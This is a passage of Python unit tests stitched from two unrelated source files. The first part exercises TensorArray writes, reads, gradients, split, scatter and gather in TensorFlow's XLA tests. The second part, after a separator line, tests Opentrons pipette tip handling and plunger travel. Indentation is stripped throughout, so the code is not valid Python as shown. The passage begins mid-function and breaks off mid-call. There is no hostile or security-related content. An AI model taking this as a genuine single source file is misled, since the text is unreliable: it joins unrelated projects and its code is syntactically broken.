self.assertAllEqual([[5.0]], g_d0)
self.assertAllEqual([[2.0]], g_d1)
self.assertAllEqual([[-2.0]], g_d2)
def testTensorGradArrayDynamicWriteRead(self):
with self.test_session() as session, self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32,
tensor_array_name="foo",
size=3)
w0 = ta.write(0, [[4.0]])
w1 = w0.write(1, [[1.0]])
w2 = w1.write(2, [[-3.0]])
g_ta = w2.grad("grad") # Get gradient array here so we know the shape
s = w2.size()
g_s = g_ta.size()
g_w0 = g_ta.write(0, [[5.0]])
g_w1 = g_w0.write(1, [[2.0]])
g_w2 = g_w1.write(2, [[-2.0]])
r0 = w2.read(0)
r1 = w2.read(1)
r2 = w2.read(2)
g_r0 = g_w2.read(0)
g_r1 = g_w2.read(1)
g_r2 = g_w2.read(2)
d0, d1, d2, g_d0, g_d1, g_d2, vs, g_vs = session.run(
[r0, r1, r2, g_r0, g_r1, g_r2, s, g_s])
self.assertAllEqual([[4.0]], d0)
self.assertAllEqual([[1.0]], d1)
self.assertAllEqual([[-3.0]], d2)
self.assertAllEqual([[5.0]], g_d0)
self.assertAllEqual([[2.0]], g_d1)
self.assertAllEqual([[-2.0]], g_d2)
self.assertAllEqual(3, vs)
self.assertAllEqual(3, g_vs)
def testTensorGradAccessTwiceReceiveSameObject(self):
with self.test_session() as session, self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32, tensor_array_name="foo", size=3,
element_shape=[1, 2])
g_ta_0 = ta.grad("grad")
g_ta_1 = ta.grad("grad")
with ops.control_dependencies([g_ta_0.write(0, [[4.0, 5.0]]).flow]):
# Write with one gradient handle, read with another copy of it
r1_0 = g_ta_1.read(0)
t_g_ta_0, t_g_ta_1, d_r1_0 = session.run(
[g_ta_0.handle.op, g_ta_1.handle.op, r1_0])
self.assertAllEqual(t_g_ta_0, t_g_ta_1)
self.assertAllEqual([[4.0, 5.0]], d_r1_0)
def testTensorArrayWriteWrongIndexOrDataTypeFails(self):
with self.test_session(), self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32, tensor_array_name="foo", size=3)
# Test writing the wrong datatype.
with self.assertRaisesOpError(
"TensorArray dtype is float but op has dtype int32"):
ta.write(-1, np.int32(7)).flow.eval()
def testTensorArrayReadWrongIndexOrDataTypeFails(self):
# Find two different floating point types, create an array of
# the first type, but try to read the other type.
if len(self.float_types) > 1:
dtype1, dtype2 = list(self.float_types)[:2]
with self.test_session(), self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=dtype1, tensor_array_name="foo", size=3)
w0 = ta.write(0, [[4.0, 5.0]])
# Test reading wrong datatype.
r0_bad = gen_data_flow_ops._tensor_array_read_v3(
handle=w0.handle, index=0, dtype=dtype2, flow_in=w0.flow)
with self.assertRaisesOpError("TensorArray dtype is "):
r0_bad.eval()
# Test reading from a different index than the one we wrote to
w0.read(1)
def testTensorArraySplitIncompatibleShapesFails(self):
with self.test_session(), self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32,
tensor_array_name="foo",
size=3,
infer_shape=False)
with self.assertRaisesOpError(
r"value is not 1D"):
lengths = array_ops.placeholder(dtypes.int64)
ta.split([1.0, 2.0, 3.0], lengths).flow.eval(feed_dict={lengths: 1})
with self.assertRaisesOpError(
r"lengths must be equal: 1 vs. 2"):
ta.split([1.0, 2.0, 3.0], [1, 2, 3]).flow.eval()
with self.assertRaisesOpError(
r"value must have rank >= 1"):
ta.split(1.0, [1]).flow.eval()
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32,
tensor_array_name="foo",
size=2,
infer_shape=False)
with self.assertRaisesOpError(
r"TensorArray's size is not equal to the size of lengths "
r"\(1 vs. 2\)"):
ta.split([1.0], [1]).flow.eval()
def _testTensorArrayWriteGradientAddMultipleAdds(self, dtype):
with self.test_session(), self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=dtype, tensor_array_name="foo", size=3, infer_shape=False)
c = lambda x: np.asarray(x, dtype=dtype.as_numpy_dtype)
w0 = ta.write(2, c(3.0))
w1 = w0.write(2, c(4.0))
ta_grad = w1.grad("grad")
w0_grad = ta_grad.write(2, c(3.0))
w1_grad = w0_grad.write(2, c(4.0))
w2_grad = w1_grad.write(2, c(5.0))
# Assert that aggregation works correctly
self.assertAllEqual(c(12.00), w2_grad.read(2).eval())
# Using differing shapes causes an exception
wb0_grad = ta_grad.write(1, c(1.0))
wb1_grad = wb0_grad.write(1, c([1.0]))
with self.assertRaisesOpError(
r"Mismatched TensorArray sizes"):
wb1_grad.flow.eval()
def testTensorArrayWriteGradientAddMultipleAdds(self):
for dtype in self.numeric_tf_types:
self._testTensorArrayWriteGradientAddMultipleAdds(dtype)
def testMultiTensorArray(self):
with self.test_session(), self.test_scope():
h1 = tensor_array_ops.TensorArray(
size=1, dtype=dtypes.float32, tensor_array_name="foo")
w1 = h1.write(0, 4.0)
r1 = w1.read(0)
h2 = tensor_array_ops.TensorArray(
size=1, dtype=dtypes.float32, tensor_array_name="bar")
w2 = h2.write(0, 5.0)
r2 = w2.read(0)
r = r1 + r2
self.assertAllClose(9.0, r.eval())
def _testTensorArrayGradientWriteReadType(self, dtype):
with self.test_session() as session, self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=dtypes.as_dtype(dtype),
tensor_array_name="foo",
size=3,
infer_shape=False)
c = lambda x: np.array(x, dtype=dtype)
value_0 = constant_op.constant(c([[4.0, 5.0]]))
value_1 = constant_op.constant(c([[3.0, 3.5]]))
w0 = ta.write(0, value_0)
w1 = w0.write(1, value_1)
r0 = w1.read(0)
r1 = w1.read(1)
r0_2 = w1.read(0)
# Test individual components' gradients
grad_just_r0 = gradients_impl.gradients(
ys=[r0], xs=[value_0], grad_ys=[c([[2.0, 3.0]])])
grad_just_r0_vals = session.run(grad_just_r0)
self.assertAllEqual(c([[2.0, 3.0]]), grad_just_r0_vals[0])
grad_r0_r0_2 = gradients_impl.gradients(
ys=[r0, r0_2],
xs=[value_0],
grad_ys=[c([[2.0, 3.0]]), c([[1.0, -1.0]])])
grad_r0_r0_2_vals = session.run(grad_r0_r0_2)
self.assertAllEqual(c([[3.0, 2.0]]), grad_r0_r0_2_vals[0])
grad_just_r1 = gradients_impl.gradients(
ys=[r1], xs=[value_1], grad_ys=[c([[-2.0, -4.0]])])
grad_just_r1_vals = session.run(grad_just_r1)
self.assertAllEqual(c([[-2.0, -4.0]]), grad_just_r1_vals[0])
# Test combined gradients
grad = gradients_impl.gradients(
ys=[r0, r0_2, r1],
xs=[value_0, value_1],
grad_ys=[c([[2.0, 3.0]]), c([[1.0, -1.0]]), c([[-2.0, -10.0]])])
grad_vals = session.run(grad)
self.assertEqual(len(grad_vals), 2)
self.assertAllEqual(c([[3.0, 2.0]]), grad_vals[0])
self.assertAllEqual(c([[-2.0, -10.0]]), grad_vals[1])
def testTensorArrayGradientWriteRead(self):
for dtype in self.numeric_types:
self._testTensorArrayGradientWriteReadType(dtype)
def _testTensorArrayGradientWritePackConcatAndRead(self):
with self.test_session() as sess, self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32,
tensor_array_name="foo",
size=2,
clear_after_read=False)
value_0 = constant_op.constant([-1.0, 1.0])
value_1 = constant_op.constant([-10.0, 10.0])
w0 = ta.write(0, value_0)
w1 = w0.write(1, value_1)
p0 = w1.stack()
r0 = w1.read(0)
s0 = w1.concat()
# Test gradient accumulation between read(0), pack(), and concat().
with ops.control_dependencies([p0, r0, s0]):
grad_r = gradients_impl.gradients(
ys=[p0, r0, s0],
xs=[value_0, value_1],
grad_ys=[
[[2.0, 3.0], [4.0, 5.0]], # stack gradient
[-0.5, 1.5], # read(0) gradient
[20.0, 30.0, 40.0, 50.0], # concat gradient
])
grad_vals = sess.run(grad_r) # 2 + 2 entries
self.assertAllClose([2.0 - 0.5 + 20.0, 3.0 + 1.5 + 30.0], grad_vals[0])
self.assertAllEqual([4.0 + 40.0, 5.0 + 50.0], grad_vals[1])
def testTensorArrayGradientWritePackConcatAndRead(self):
self._testTensorArrayGradientWritePackConcatAndRead()
def testTensorArrayReadTwice(self):
with self.test_session(), self.test_scope():
value = constant_op.constant([[1.0, -1.0], [10.0, -10.0]])
ta_readtwice = tensor_array_ops.TensorArray(
dtype=dtypes.float32,
tensor_array_name="foo",
size=2,
clear_after_read=False)
w_readtwice = ta_readtwice.unstack(value)
r0_readtwice = w_readtwice.read(0)
with ops.control_dependencies([r0_readtwice]):
r1_readtwice = w_readtwice.read(0)
self.assertAllEqual([1.0, -1.0], r1_readtwice.eval())
def _testTensorArrayGradientUnpackRead(self):
with self.test_session() as session, self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32,
tensor_array_name="foo",
size=2,
clear_after_read=False)
value = constant_op.constant([[1.0, -1.0], [10.0, -10.0]])
w = ta.unstack(value)
r0 = w.read(0)
r0_1 = w.read(0)
r1 = w.read(1)
# Test combined gradients + aggregation of read(0).
grad = gradients_impl.gradients(
ys=[r0, r0_1, r1],
xs=[value],
grad_ys=[[2.0, 3.0], [-1.5, 1.5], [4.0, 5.0]])
grad_vals = session.run(grad)
self.assertEqual(len(grad_vals), 1)
self.assertAllEqual([[2.0 - 1.5, 3.0 + 1.5], [4.0, 5.0]], grad_vals[0])
def testTensorArrayGradientUnpackRead(self):
self._testTensorArrayGradientUnpackRead()
def testTensorArrayGradientSplitConcat(self):
with self.test_session() as session, self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32, tensor_array_name="foo", size=2)
value = constant_op.constant(
[[1.0, -1.0], [10.0, -10.0], [100.0, -100.0], [1000.0, -1000.0]])
w = ta.split(value, [2, 2])
r = w.concat()
# Test combined gradients
grad = gradients_impl.gradients(
ys=[r],
xs=[value],
grad_ys=[[[2.0, -2.0], [20.0, -20.0], [200.0, -200.0],
[2000.0, -2000.0]]])
grad_vals = session.run(grad)
self.assertEqual(len(grad_vals), 1)
self.assertAllEqual([[2.0, -2.0], [20.0, -20.0], [200.0, -200.0],
[2000.0, -2000.0]],
grad_vals[0])
def testCloseTensorArray(self):
with self.test_session() as session, self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32, tensor_array_name="foo", size=3)
c1 = ta.close()
session.run(c1)
def testSizeTensorArray(self):
with self.test_session(), self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32, tensor_array_name="foo", size=3)
s = ta.size()
self.assertAllEqual(3, s.eval())
def testWriteCloseTensorArray(self):
with self.test_session(), self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32,
tensor_array_name="foo",
size=3,
infer_shape=False)
w0 = ta.write(0, [[4.0, 5.0]])
w1 = w0.write(1, [3.0])
w1.close().run() # Expected to run without problems
# TODO(phawkins): implement while loops.
# def _testWhileLoopWritePackGradients(self, dynamic_size, dtype):
# np_dtype = dtype.as_numpy_dtype
# with self.test_session() as session, self.test_scope():
# v0 = array_ops.identity(np.arange(3 * 5, dtype=np_dtype).reshape(3, 5))
# var = variables.Variable(np.arange(100, 105, dtype=np_dtype))
# state0 = array_ops.identity(np.array([1] * 5, dtype=np_dtype))
# ta = tensor_array_ops.TensorArray(
# dtype=dtype,
# tensor_array_name="foo",
# size=0 if dynamic_size else 3,
# dynamic_size=dynamic_size)
# time_0 = array_ops.identity(0)
# def body(time, ta_t, state):
# sliced = array_ops.slice(
# v0, begin=array_ops.stack([time, 0]), size=[1, -1])
# sliced = array_ops.squeeze(sliced)
# out = sliced + var + state
# state += sliced
# ta_t = ta_t.write(time, out)
# return (time + 1, ta_t, state)
# (unused_0, h_final, unused_2) = control_flow_ops.while_loop(
# cond=lambda time, unused_1, unused_2: time < 3,
# body=body,
# loop_vars=(time_0, ta, state0),
# shape_invariants=(time_0.get_shape(), tensor_shape.unknown_shape(),
# tensor_shape.unknown_shape()),
# parallel_iterations=3)
# vout = h_final.stack()
# grad_val = -np.arange(3 * 5, dtype=np_dtype).reshape(3, 5)
# v0_grad = gradients_impl.gradients([vout], [v0], [grad_val])[0]
# state0_grad = gradients_impl.gradients([vout], [state0], [grad_val])[0]
# var_grad = gradients_impl.gradients([vout], [var], [grad_val])[0]
# variables.global_variables_initializer().run()
# state0_t, var_t, v0_t, vout_t, v0_grad_t, var_grad_t, state0_grad_t = (
# session.run([state0, var, v0, vout, v0_grad, var_grad, state0_grad])
# )
# just_v0_grad_t, = session.run([v0_grad])
# # state = [ state0 | state0 + v0[0] | state0 + v0[0] + v0[1] ]
# # vout = [ v0[0] + var + state[0] |
# # v0[1] + var + state[1] |
# # v0[2] + var + state[2] ]
# # = [ v0[0] + var + state0 |
# # v0[1] + var + state0 + v0[0] |
# # v0[2] + var + state0 + v0[0] + v0[1] ]
# #
# # d(vout[0])/d(v0) = [1 | 0 | 0 ]
# # d(vout[1])/d(v0) = [1 | 1 | 0 ]
# # d(vout[2])/d(v0) = [1 | 1 | 1 ]
# # d(vout)/d(var) = [1 | 1 | 1]
# # d(vout)/d(state0) = [ 1 | 1 | 1 ]
# state_per_time = np.array(
# [state0_t, state0_t + v0_t[0, :],
# state0_t + v0_t[0, :] + v0_t[1, :]])
# # Compare forward prop
# self.assertAllClose(v0_t + var_t + state_per_time, vout_t)
# # Compare backward prop
# expected_v0_grad_t = np.array([
# grad_val[0, :] + grad_val[1, :] + grad_val[2, :],
# grad_val[1, :] + grad_val[2, :], grad_val[2, :]
# ])
# self.assertAllEqual(expected_v0_grad_t, v0_grad_t)
# self.assertAllEqual(expected_v0_grad_t, just_v0_grad_t)
# self.assertAllClose(grad_val.sum(axis=0), var_grad_t)
# self.assertAllClose(grad_val.sum(axis=0), state0_grad_t)
# def testWhileLoopWritePackGradients(self):
# self._testWhileLoopWritePackGradients(
# dynamic_size=False, dtype=dtypes.float32)
# # TODO(ebrevdo): re-enable when While supports non-float32 gradients.
# # self._testWhileLoopWritePackGradients(
# # dynamic_size=False, dtype=tf.int64)
# def testWhileLoopDynamicWritePackGradients(self):
# self._testWhileLoopWritePackGradients(
# dynamic_size=True, dtype=dtypes.float32)
# def testGradSerialTwoLoops(self):
# with self.test_session(), self.test_scope():
# num_steps = 100
# acc = tensor_array_ops.TensorArray(
# dtype=dtypes.float32,
# size=num_steps,
# clear_after_read=False,
# element_shape=tensor_shape.scalar())
# i = constant_op.constant(0, name="i")
# x = constant_op.constant(2.0, name="x")
# c = lambda i, acc: i < 5
# def b(i, acc):
# x1 = control_flow_ops.cond(
# math_ops.equal(i, 0), lambda: x,
# lambda: math_ops.multiply(acc.read(i - 1), 2.0))
# return i + 1, acc.write(i, x1)
# i1, acc1 = control_flow_ops.while_loop(c, b, [i, acc])
# z = constant_op.constant(0.0)
# def fn(i, acc):
# return i + 1, acc.write(i, z)
# _, acc2 = control_flow_ops.while_loop(lambda i, acc: i < num_steps, fn,
# [i1, acc1])
# r = acc2.stack()
# grad = gradients_impl.gradients(r, [x])[0]
# self.assertAllClose(31.0, grad.eval())
def testSumOfTwoReadVariablesWithoutRepeatGrad(self):
with self.test_session() as session, self.test_scope():
a = array_ops.identity(
np.arange(
3 * 5, dtype=np.float32).reshape(3, 5) + 1)
b = array_ops.identity(
np.arange(
3 * 5, dtype=np.float32).reshape(3, 5) + 1 + 3 * 5)
ta = tensor_array_ops.TensorArray(dtype=dtypes.float32, size=2)
ta = ta.write(0, a, name="write_a")
ta = ta.write(1, b, name="write_b")
c = (
ta.read(
0, name="read_a_0") + # a + b
ta.read(
1, name="read_b_0"))
g0 = -(np.arange(3 * 5, dtype=np.float32).reshape(3, 5) + 1)
grad_a = gradients_impl.gradients([c], [a], [g0])[0] # d(a+b)/da = 1
grad_b = gradients_impl.gradients([c], [b], [g0])[0] # d(a+b)/db = 1
# Test gradients calculated individually
grad_a_t, = session.run([grad_a])
self.assertAllEqual(grad_a_t, g0)
grad_b_t, = session.run([grad_b])
self.assertAllEqual(grad_b_t, g0)
# Test gradients calculated jointly.
joint_grad_a_t, joint_grad_b_t = session.run([grad_a, grad_b])
self.assertAllEqual(joint_grad_a_t, g0)
self.assertAllEqual(joint_grad_b_t, g0)
def testWriteShape(self):
with self.test_session(), self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32, tensor_array_name="foo", size=3)
c0 = constant_op.constant([4.0, 5.0])
w0 = ta.write(0, c0)
r0 = w0.read(0)
self.assertAllEqual(c0.get_shape(), r0.get_shape())
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32, tensor_array_name="foo", size=3)
c1 = constant_op.constant([6.0, 7.0])
w1 = w0.write(1, c1)
r0 = w1.read(0)
r1 = w1.read(1)
self.assertAllEqual(c0.get_shape(), r0.get_shape())
self.assertAllEqual(c1.get_shape(), r1.get_shape())
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32, tensor_array_name="foo", size=3)
c2 = constant_op.constant([4.0, 5.0, 6.0])
with self.assertRaises(ValueError):
w0.write(0, c2)
def testPartlyUnknownShape(self):
with self.test_session(), self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32, tensor_array_name="foo", size=6)
c0 = array_ops.placeholder(dtypes.float32, [None, None, None, 3])
w0 = ta.write(0, c0)
r0 = w0.read(0)
self.assertAllEqual([None, None, None, 3], r0.get_shape().as_list())
c1 = array_ops.placeholder(dtypes.float32, [None, None, None, 3])
w1 = w0.write(1, c1)
r1 = w1.read(0)
self.assertAllEqual([None, None, None, 3], r1.get_shape().as_list())
# Writing a less specific shape (doesn't change the inferred type).
c2 = array_ops.placeholder(dtypes.float32, [None, None, None, None])
w2 = w1.write(2, c2)
r2 = w2.read(0)
self.assertAllEqual([None, None, None, 3], r2.get_shape().as_list())
# Writing more specific shape in one dimension and less specific in
# another.
c3 = array_ops.placeholder(dtypes.float32, [None, None, 2, None])
w3 = w2.write(3, c3)
r3 = w3.read(0)
self.assertAllEqual([None, None, 2, 3], r3.get_shape().as_list())
# Writing partly defined shape using TensorArray.scatter.
c4 = array_ops.placeholder(dtypes.float32, [2, None, 4, 2, 3])
w4 = w3.scatter([4, 5], c4)
r4 = w4.read(0)
self.assertAllEqual([None, 4, 2, 3], r4.get_shape().as_list())
# Writing fully defined shape using TensorArray.split.
c5 = array_ops.placeholder(dtypes.float32, [10, 4, 2, 3])
w5 = w4.split(c5, constant_op.constant([5, 5]))
r5 = w5.read(0)
self.assertAllEqual([5, 4, 2, 3], r5.get_shape().as_list())
def _testUnpackShape(self):
with self.test_session(), self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32,
tensor_array_name="foo",
size=0,
infer_shape=True)
value = constant_op.constant(
[[1.0, -1.0], [10.0, -10.0], [100.0, -100.0]])
w0 = ta.unstack(value)
r0 = w0.read(0)
self.assertAllEqual((2,), r0.get_shape())
c1 = constant_op.constant([4.0, 5.0])
w1 = w0.write(3, c1)
r1 = w1.read(0)
self.assertAllEqual(c1.get_shape(), r1.get_shape())
c2 = constant_op.constant([4.0, 5.0, 6.0])
with self.assertRaises(ValueError):
w1.write(4, c2)
def testUnpackShape(self):
self._testUnpackShape()
def testSplitShape(self):
with self.test_session(), self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32,
tensor_array_name="foo",
size=0,
infer_shape=True)
value = constant_op.constant([[1.0, -1.0], [2.0, -2.0], [3.0, -3.0]])
w0 = ta.split(value, [1, 1, 1])
r0 = w0.read(0)
self.assertAllEqual((1, 2), r0.get_shape())
ta1 = tensor_array_ops.TensorArray(
dtype=dtypes.float32,
tensor_array_name="foo1",
size=0,
infer_shape=True)
w0 = ta1.split(value, [1, 2])
r0 = w0.read(0)
self.assertAllEqual(r0.get_shape(), tensor_shape.unknown_shape())
def testWriteUnknownShape(self):
with self.test_session(), self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32,
tensor_array_name="foo",
size=3,
infer_shape=True)
c0 = array_ops.placeholder(dtypes.float32)
w0 = ta.write(0, c0)
r0 = w0.read(0)
self.assertAllEqual(r0.get_shape(), tensor_shape.unknown_shape())
def _testGradientWhenNotAllComponentsRead(self):
with self.test_session() as session, self.test_scope():
ta = tensor_array_ops.TensorArray(dtype=dtypes.float32, size=2)
x = constant_op.constant([2.0, 3.0])
w = ta.unstack(x)
r0 = w.read(0)
# Calculate (dr0/dx0, dr0/dx1). Since r0 = x0, the gradients are (1, 0).
grad_r0 = gradients_impl.gradients(ys=[r0], xs=[x], grad_ys=[1.0])
grad_r0_vals = session.run(grad_r0)[0]
self.assertAllEqual(grad_r0_vals, [1.0, 0.0])
def testGradientWhenNotAllComponentsRead(self):
self._testGradientWhenNotAllComponentsRead()
def _testTensorArrayEvalEmpty(self):
with self.test_session(), self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32, size=0, infer_shape=False)
with self.assertRaisesOpError(
"TensorArray has size zero, but element shape <unknown> is not fully "
"defined. Currently only static shapes are supported when packing "
"zero-size TensorArrays."):
ta.stack().eval()
def testTensorArrayEvalEmpty(self):
self._testTensorArrayEvalEmpty()
def _testTensorArrayEvalEmptyWithDefault(self):
with self.test_session(), self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32, size=0, infer_shape=True)
self.assertEqual(0, ta.size().eval())
ta = ta.unstack(array_ops.zeros([0, 3, 5]))
packed = ta.stack()
self.assertAllEqual([0, 3, 5], packed.eval().shape)
# Concatenating zero tensors along their first dimension gives a
# first dimension of zero
self.assertAllEqual([0, 5], ta.concat().eval().shape)
def testTensorArrayEvalEmptyWithDefault(self):
self._testTensorArrayEvalEmptyWithDefault()
def testTensorArrayScatterReadAndGradients(self):
with self.test_session() as session, self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32,
tensor_array_name="foo",
size=10)
indices = constant_op.constant([1, 8])
value = constant_op.constant([[1.0, -1.0], [10.0, -10.0]])
w = ta.scatter(indices, value)
r0 = w.read(1)
r1 = w.read(8)
# Test combined gradients of read(1) and read(8).
grad = gradients_impl.gradients(
ys=[r0, r1], xs=[value], grad_ys=[[2.0, 3.0], [4.0, 5.0]])
read_vals, grad_vals = session.run([[r0, r1], grad])
self.assertEqual(len(read_vals), 2)
self.assertEqual(len(grad_vals), 1)
self.assertAllEqual([1.0, -1.0], read_vals[0])
self.assertAllEqual([10.0, -10.0], read_vals[1])
self.assertAllEqual([[2.0, 3.0], [4.0, 5.0]], grad_vals[0])
def testTensorArrayWriteGatherAndGradients(self):
with self.test_session() as session, self.test_scope():
ta = tensor_array_ops.TensorArray(
dtype=dtypes.float32,
tensor_array_name="foo",
size=10)
values = constant_op.constant([[1.0 * x, -1.0 * x] for x in range(10)])
indices = constant_op.constant([1, 8])
w = ta.unstack(values)
g = w.gather(indices)
# Test combined gradients through the gather op.
grad = gradients_impl.gradients(
ys=[g], xs=[values], grad_ys=[[[2.0, 3.0], [4.0, 5.0]]])
g_vals, grad_vals = session.run([[g], grad])
# Gradients for the 8 unread components (out of 10) are zero.
expected_grad = np.zeros((10, 2))
expected_grad[1] = [2.0, 3.0]
expected_grad[8] = [4.0, 5.0]
self.assertEqual(len(g_vals), 1)
self.assertEqual(len(grad_vals), 1)
self.assertAllEqual([[1.0, -1.0], [8.0, -8.0]], g_vals[0])
self.assertAllEqual(expected_grad, grad_vals[0])
def testTensorArrayIdentity(self):
with self.test_session() as session, self.test_scope():
ta0 = tensor_array_ops.TensorArray(dtype=dtypes.float32, size=2,
infer_shape=False)
ta1 = tensor_array_ops.TensorArray(dtype=dtypes.int32, size=4,
infer_shape=True)
ta0 = ta0.write(0, 0.)
ta1 = ta1.write(0, 1)
v0 = resource_variable_ops.ResourceVariable(0)
v1 = resource_variable_ops.ResourceVariable(0)
with ops.control_dependencies([v0.assign_add(1)]):
ta0 = ta0.identity()
with ops.control_dependencies([v1.assign_add(1)]):
ta1 = ta1.identity()
read0 = ta0.read(0)
read1 = ta1.read(0)
size0 = ta0.size()
size1 = ta1.size()
# Tests correct properties on new TensorArrays.
self.assertEqual(dtypes.float32, ta0.dtype)
self.assertEqual(dtypes.int32, ta1.dtype)
self.assertEqual(tensor_shape.unknown_shape(), read0.get_shape())
self.assertEqual(tensor_shape.scalar(), read1.get_shape())
variables.global_variables_initializer().run()
read0_v, read1_v, size0_v, size1_v = session.run(
(read0, read1, size0, size1))
# Tests that the control dependencies were added and executed.
self.assertEqual(1, v0.eval())
self.assertEqual(1, v1.eval())
# Tests correct TensorArray.
self.assertEqual(read0_v, 0)
self.assertEqual(read1_v, 1)
self.assertEqual(size0_v, 2)
self.assertEqual(size1_v, 4)
if __name__ == "__main__":
test.main()
|
|
# pylama:ignore=E501
# TODO: Modify all calls to get a Well to use the `wells` method
from numpy import isclose
from unittest import mock
import pytest
from opentrons.legacy_api.containers import load as containers_load
from opentrons.config import pipette_config
from opentrons.trackers import pose_tracker
@pytest.mark.api1_only
def test_use_filter_tips(instruments, robot):
# test tips with a lower working volume than the max volume of the
# pipette, to ensure the pipette never over-aspirates with a smaller tip
tipracks = [
'opentrons_96_filtertiprack_10ul',
'opentrons_96_filtertiprack_200ul',
'opentrons_96_filtertiprack_1000ul'
]
for t in tipracks:
robot.reset()
tip_rack = containers_load(robot, t, '3')
plate = containers_load(robot, '96-flat', '1')
p300 = instruments.P300_Single(
mount='left', tip_racks=[tip_rack])
p300.pick_up_tip()
p300.aspirate(plate[0])
# working volume should be the lesser of the pipette max volume
# and the tip max volume
assert p300.current_volume == p300._working_volume
assert p300.current_volume == min(
tip_rack[0].max_volume(), p300.max_volume)
# working volume should revert to the pipette max volume if no tip
# is attached
p300.return_tip()
assert p300._working_volume == p300.max_volume
@pytest.mark.api1_only
def test_shake_during_pick_up(monkeypatch, robot, instruments):
robot.reset()
pip = instruments._create_pipette_from_config(
config=pipette_config.load('p1000_single_v2.0'),
mount='left',
name='p1000_single_v2.0')
tiprack = containers_load(robot, 'opentrons_96_tiprack_1000ul', '1')
shake_tips_pick_up = mock.Mock(
side_effect=pip._shake_off_tips_pick_up)
monkeypatch.setattr(pip, '_shake_off_tips_pick_up',
shake_tips_pick_up)
# Test double shake after picking up tips
pip.pick_up_tip(tiprack[0])
assert shake_tips_pick_up.call_count == 2
actual_calls = []
def mock_jog(pose_tree, axis, distance):
actual_calls.append((axis, distance))
monkeypatch.setattr(pip, '_jog', mock_jog)
# Test shake in both x and y
shake_tips_pick_up()
expected_calls = [('x', -0.3), ('x', 0.6), ('x', -0.3),
('y', -0.3), ('y', 0.6), ('y', -0.3),
('z', 20)]
assert actual_calls == expected_calls
pip.tip_attached = False
@pytest.mark.api1_only
def test_shake_during_drop(monkeypatch, robot, instruments):
robot.reset()
pip = instruments._create_pipette_from_config(
config=pipette_config.load('p1000_single_v1.5'),
mount='left',
name='p1000_single_v2.0')
tiprack = containers_load(robot, 'opentrons_96_tiprack_1000ul', '1')
shake_tips_drop = mock.Mock(
side_effect=pip._shake_off_tips_drop)
monkeypatch.setattr(pip, '_shake_off_tips_drop',
shake_tips_drop)
# Test single shake after dropping tips
pip.tip_attached = True
pip.drop_tip(tiprack.wells(0))
assert shake_tips_drop.call_count == 1
actual_calls = []
def jog_side_effect(pose_tree, axis, distance):
actual_calls.append((axis, distance))
jog = mock.Mock(side_effect=jog_side_effect)
monkeypatch.setattr(pip, '_jog', jog)
# Test shake only in x; with no location passed, the shake distance is 2.25
shake_tips_drop()
expected_calls = [('x', -2.25), ('x', 4.5), ('x', -2.25),
('z', 20)]
assert actual_calls == expected_calls
# Test drop tip shake at a well with diameter above upper limit (2.25 mm)
tiprack.wells(0).properties['width'] = 2.3*4
actual_calls.clear()
shake_tips_drop(tiprack.wells(0))
expected_calls = [('x', -2.25), ('x', 4.5), ('x', -2.25),
('z', 20)]
assert actual_calls == expected_calls
# Test drop tip shake at a well with diameter between upper limit
# and lower limit (1.00 - 2.25 mm)
tiprack.wells(0).properties['width'] = 2*4
actual_calls.clear()
shake_tips_drop(tiprack.wells(0))
expected_calls = [('x', -2), ('x', 4), ('x', -2),
('z', 20)]
assert actual_calls == expected_calls
# Test drop tip shake at a well with diameter below lower limit (1.00 mm)
tiprack.wells(0).properties['width'] = 0.9*4
actual_calls.clear()
shake_tips_drop(tiprack.wells(0))
expected_calls = [('x', -1), ('x', 2), ('x', -1),
('z', 20)]
assert actual_calls == expected_calls
pip.tip_attached = False
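# Note on the expected distances above: across the three cases the shake
# distance works out to properties['width'] / 4, clamped to the
# [1.00, 2.25] mm range; this is inferred from the expected values here,
# not taken from the pipette implementation itself.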
@pytest.mark.api1_only
def test_pipette_version_1_0_and_1_3_extended_travel(robot, instruments):
models = [
'p10_single', 'p10_multi', 'p50_single', 'p50_multi',
'p300_single', 'p300_multi', 'p1000_single'
]
for m in models:
robot.reset()
v1 = m + '_v1'
v13 = m + '_v1.3'
left = instruments._create_pipette_from_config(
config=pipette_config.load(v1),
mount='left',
name=v1)
right = instruments._create_pipette_from_config(
config=pipette_config.load(v13),
mount='right',
name=v13)
# the difference between v1 and v1.3 is that the plunger's travel
# distance was extended, allowing greater ranges for aspirate/dispense
# and blow-out. Test that all v1.3 pipettes have larger travel than v1
left_poses = left.plunger_positions
left_diff = left_poses['top'] - left_poses['blow_out']
right_poses = right.plunger_positions
right_diff = right_poses['top'] - right_poses['blow_out']
assert right_diff > left_diff
@pytest.mark.api1_only
def test_all_pipette_models_can_transfer(robot, instruments):
from opentrons.config import pipette_config
models = [
'p10_single', 'p10_multi', 'p50_single', 'p50_multi',
'p300_single', 'p300_multi', 'p1000_single'
]
for m in models:
robot.reset()
v1 = m + '_v1'
v13 = m + '_v1.3'
left = instruments._create_pipette_from_config(
config=pipette_config.load(v1),
mount='left',
name=v1)
right = instruments._create_pipette_from_config(
config=pipette_config.load(v13),
mount='right',
